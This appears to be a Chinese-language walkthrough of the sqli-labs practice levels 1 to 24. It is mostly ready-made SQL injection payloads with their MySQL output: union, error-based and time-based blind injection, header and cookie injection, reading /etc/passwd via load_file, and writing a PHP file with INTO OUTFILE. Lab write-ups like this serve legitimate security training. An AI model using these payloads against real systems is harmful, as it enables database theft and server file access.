sqli-lab 题解


sqli-lab:1

 --后边必须跟空格,而且空格必须是url编码的,不然在url中是不识别的。eg:--%20 ,#的空格是%23

order by 去发现列数

union select 去显示要的数据,当order by不起作用的时候,当order by 不在末尾的时候。也可以用来判断列。如:

mysql> SELECT * FROM users WHERE id =3 order by 55 or 2;

+----+----------+----------+

| id | username | password |

+----+----------+----------+

|  3 | Dummy    | p@ssword |

+----+----------+----------+

1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id =3 union all select 1,2,3 or 2;

+----+----------+----------+

| id | username | password |

+----+----------+----------+

|  3 | Dummy    | p@ssword |

|  1 | 2        | 1        |

+----+----------+----------+

2 rows in set (0.02 sec)

mysql> SELECT * FROM users WHERE id =3 union all select 1,2,3,4 or 2;

ERROR 1222 (21000): The used SELECT statements have a different number of columns

 

这一节主要就是讲sting类型的报错注入,

SELECT * FROM users WHERE id=‘1‘‘ LIMIT 0,1

1)报错:syntax to use near ‘‘ LIMIT 0,1‘ at line 1猜测可能的sql语句,从字符,数字,字符+数字等 select login_name,login_passwd from users where id=‘input id‘ limit 0,1;

‘1‘‘ LIMIT 0,1 就是因为多了‘导致的报错,尝试1\‘可能就不会有错了,同时还有正确的结果,因为在处理id=‘1 union all‘被处理成了id=‘1‘,这个处理是数据库处理的。

mysql> desc users;

+----------+-------------+------+-----+---------+----------------+

| Field    | Type        | Null | Key | Default | Extra          |

+----------+-------------+------+-----+---------+----------------+

| id       | int(3)      | NO   | PRI | NULL    | auto_increment |

| username | varchar(20) | NO   |     | NULL    |                |

| password | varchar(20) | NO   |     | NULL    |                |

+----------+-------------+------+-----+---------+----------------+

3 rows in set (0.10 sec)

mysql> select * from users where id =‘33‘;

Empty set (0.00 sec)

mysql> select * from users where id =‘3 union all ‘;

+----+----------+----------+

| id | username | password |

+----+----------+----------+

|  3 | Dummy    | p@ssword |

+----+----------+----------+

1 row in set, 1 warning (0.00 sec)

union all 为什么还会输出原来的行呢?

mysql> SELECT username FROM users WHERE id=‘1‘ union all select version();
+------------------+
| username         |
+------------------+
| Dumb             |
| 5.5.38-0+wheezy1 |
+------------------+

注意加limit 1,1限制,只读取第二行,union all的作用就是合并重复的行

sqli-lab:2

说说

‘ LIMIT 0,1

SQL原型:

$sql="SELECT * FROM users WHERE id=‘$id‘ LIMIT 0,1";

字符型注入:?id=1\ 报错:near ‘‘1\‘ LIMIT 0,1‘ at line 1

?id=1‘ 报错:near ‘‘1‘‘ LIMIT 0,1‘ at line 1

数字型注入:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

?id=1‘ 报错:near ‘‘ LIMIT 0,1‘ at line 1

?id=1\ 报错:near ‘\ LIMIT 0,1‘ at line 1

sqli-lab:3

?id=1‘

near ‘‘1‘‘) LIMIT 0,1‘ at line 1

?id=1\

near ‘‘1\‘) LIMIT 0,1‘ at line 1                           ‘1\‘) LIMIT 0,1  可以猜测右边是(‘

可能的sql语句:select name,passwd from users where id = (‘$id‘);

实际sql:

$sql="SELECT * FROM users WHERE id=(‘$id‘) LIMIT 0,1";

sqli-lab:4

?id=1\

near ‘"1\") LIMIT 0,1‘ at line 1             "1\") LIMIT 0,1 看输入右边

?id=1"

near ‘"1"") LIMIT 0,1‘ at line 1 

可能的sql语句:select name,passwd from users where id = ("$id");

利用语句:http://192.168.229.138/sqli-labs/Less-4/?id=1") union all select 1,2,3 limit 1,1 --+ 或者使用变成一个不存在的数,如9999") union all select 1, current_user,3

实际语句:

$id = ‘"‘ . $id . ‘"‘;

$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

?id=99") union all select 1,2,table_name from information_schema.tables where table_schema=‘security‘ --+ 通过table_schema 数据库名

?id=99") union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security‘ --+ 将列上的组织起来,就免去了limit 0,1;limit 1,2来一个个查询的必要了,这样就得到所有的表名,

?id=99") union all select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘emails‘ --+  根据表名再得到列名,这样整个系统就清楚了。

database(),information_schema.tables (table_schema),information_schema.columns (table_name) 

1---------4都是通过union来发现数据。

sqli-lab:5

?id=1\

near ‘‘1\‘ LIMIT 0,1‘ at line 1                 ‘1\‘ LIMIT 0,1

由于没有显示相应的用户名,密码,只是告诉你进来了,可以采用报错注入,

?id=9‘ or 1=updatexml(1,concat(0x5e24,@@datadir,0x5e24),1) --+               0x5e24必须全,不然就会缺胳膊少腿。

XPATH syntax error: ‘^$/var/lib/mysql/^$‘

?id=1‘ and 1=updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database()),0x5e24),1) --+

会报more than one lines,可用group_concat,eg:

?id=1‘ and 1=updatexml(1,concat(0x5e24,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5e24),1) --+

列查找:

?id=1‘ and 1=updatexml(1,concat(0x5e24,(select group_concat(column_name) from information_schema.columns where table_schema=database()),0x5e24),1) --+

sqli-lab:6

1),利用rand()报错,条件,count(*), floor(rand()*2), group by 四个条件缺一不可,现在来构造

select database();

select concat(0x2f,0x2f,(select database()));用()圈起来表示用其结果

select concat(0x2f,0x2f,(select database()),floor(rand()*2))a from information_schema.tables group by a

select 1 from (xxxx)b;

在测试过程中发现执行几遍有时候成功,有时候失败,如下:

mysql>  select count(*), concat(      (select version()),floor(rand()*11)      )a from information_schema.schemata group by a;

ERROR 1062 (23000): Duplicate entry ‘5.5.38-0+wheezy13‘ for key ‘group_key‘

mysql>  select count(*), concat((select version()),floor(rand()*11))a from information_schema.schemata group by a;

+----------+-------------------+

| count(*) | a                 |

+----------+-------------------+

|        1 | 5.5.38-0+wheezy10 |

 

2)利用extractvalue

?id=1‘ and 1=extractvalue(1,concat(0x5e24,(select user()))) --+

结果:

XPATH syntax error: ‘^$root@localhost‘

3)name_const

mysql> select * from (select name_const(version(),1),name_const(version(),1) as a)b

    -> ;

+------------------+------+

| 5.5.38-0+wheezy1 | a    |

+------------------+------+

|                1 |    1 |

+------------------+------+

1 row in set (0.00 sec)

mysql> (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as xx)

    -> ;

ERROR 1060 (42S21): Duplicate column name ‘5.5.38-0+wheezy1‘

select 外围加括号

?id=1" and 1=(select * from (select name_const(version(),1), name_const(version(),1))b) --+

Duplicate column name ‘5.5.38-0+wheezy1‘

select(password)from(users);换成*目前还不行

select/**/*/**/from/**/users;

mysql> insert into users(username,password) values(‘admin4                                                                   x‘,‘password‘);
Query OK, 1 row affected, 1 warning (0.03 sec)

mysql> select * from users where username=‘admin4‘;
+----+----------------------+----------+
| id | username             | password |
+----+----------------------+----------+
| 14 | admin4               | admin4   |
| 15 | admin4               | password |

select * from users where username=‘admin4‘ union all select 1,2,load_file(‘/etc/passwd‘); 

通过updatexml,extractvalue,name_const都有字段字符限制,union则没有该限制。

 select load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))

sqli-lab7 

导出文件

?id=1‘)) union all select NULL,NULL,0x3c3f70687020706870696e666f28293f3e into outfile ‘/tmp/xx.php‘ --%20 %23

导出文件最后是以mysql权限存在的,所以只有在mysql有权限的地方才能操作。

root@kali:/var/www/sqli-labs/Less-7# ls -l /tmp/xx.php
-rw-rw-rw- 1 mysql mysql 36 Apr 24 23:37 /tmp/xx.php

sqli-lab9

select benchmark(5000,encode(‘hello‘,‘world‘)) ;第一个参数表示执行次数,第二个参数则是执行表达式。

?id=1‘ and benchmark(5000000,ENCODE(‘hello‘,‘world‘)) --%20

?id=1‘ and benchmark(5000000,(select md5(‘5‘))) --%20

select 是执行一个动作,如果需要就得结果就得加上()

?id=1‘ and sleep(5) --%20

?id=1‘ and (select if(1=1,sleep(5),null)) --%20 执行5s多

?id=1‘ and if(1=1,sleep(5),null) --%20 执行5s多

?id=1‘ and (select if(1=0,sleep(5),null)) --%20 不会有延迟

sqli-lab10

?id=1" and if(1=1,sleep(4),null) --%20

?id=1" and (select if(1=1,sleep(4),null)) --%20

or (select if((select database())="security",sleep(2),null));

or (select if(database()="security",sleep(1),null));

or (select if(database() like "securit%",sleep(1),null));     

select if((select table_name from information_schema.tables where table_name=‘users‘ limit 0,1) like ‘use%‘  ,sleep(1),null);

总结下:

从刚开始的报错,就基本能看出组装的sql语句格式,然后拼接完整‘ %23 和以前一样的话ok,再到爆出mysql_error,再到只告诉有语法错误,再到什么也不提示。union select (有显示行)---> updatexml,extractvalue,name_const (报错)----->or 1=1 [两次显示不一致]------>select if(1=1,sleep(1),null)(都没有呗,但是有sql注入)

sqli-lab 11

uname=admin&passwd=password‘ union all select 1,(select group_concat(username) from users) --%20 &submit=Submit

sqli-lab 12

uname=admin&passwd=password") union all select 1,(select group_concat(username) from users) --%20 &submit=Submit

sqli-lab 13

uname=admin‘) or 1=updatexml(1,concat(0x5e24,version(),0x5e24),1) --%20&passwd=password‘)  --%20 &submit=Submit

uname=admin‘) or (select if(1=1,sleep(1),null)) --%20&passwd=password‘)  --%20 &submit=Submit

sqli-lab 14

uname=admin" or (select substr((select version()),1,1))=‘5‘ --%20&passwd=password&submit=Submit

sqli-lab 15

uname=admin‘ and (select if(1=1,sleep(2),null))--%20&passwd=password&submit=Submit

select * from users where username=‘admin‘ or (select if(1=1,sleep(2),null)); 也可以

and or等后跟结果表达式,而不是求算式,select xx,是求,加了括号就变成了结果,

sqli-lab 16

uname=admin&passwd=password") or (select if(1=1,sleep(2),null)) --%20&submit=Submit

sqli-lab 17

uname=admin&passwd=password‘ or 1=updatexml(1,concat(0x5e24,version(),0x5e24),1) --%20&submit=Submit

sqli-lab 18

User-Agent: cc‘ or 1=updatexml(1,concat(0x5e24,version(),0x5e24),1),‘‘,‘‘) -- )

sqli-lab 19:

referer:

‘ or 1=extractvalue(1,concat(0x3c,version(),0x3c)),‘‘)#

‘ or 1=extractvalue(1,concat(0x5e24,version(),0x5e24)),‘‘)#

sqli-lab 20:

Cookie:uname=admin‘ or 1=(select * from (select name_const(version(),1),name_const(version(),1))a group by a) --%20

Cookie: uname=admind‘ union all select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security‘),3 --%20

sqli-lab 21:

Cookie:

uname=YWRtaW4nKSB1bmlvbiBhbGwgc2VsZWN0IDEsbG9hZF9maWxlKCcvZXRjL3Bhc3N3ZCcpLDMgaW50byBvdXRmaWxlICcvdG1wL3h4LmxvZycgIw==

22一样

sqli-lab 23:

id=100‘ union all select 1,2,3 or ‘1‘=‘1

SELECT * FROM users WHERE id=‘100‘ union all select 1,2,3 or ‘1‘=‘1‘ LIMIT 0,1 加黑部分组合起来

sqli-lab 24:

新建admin’ -- 用户


郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。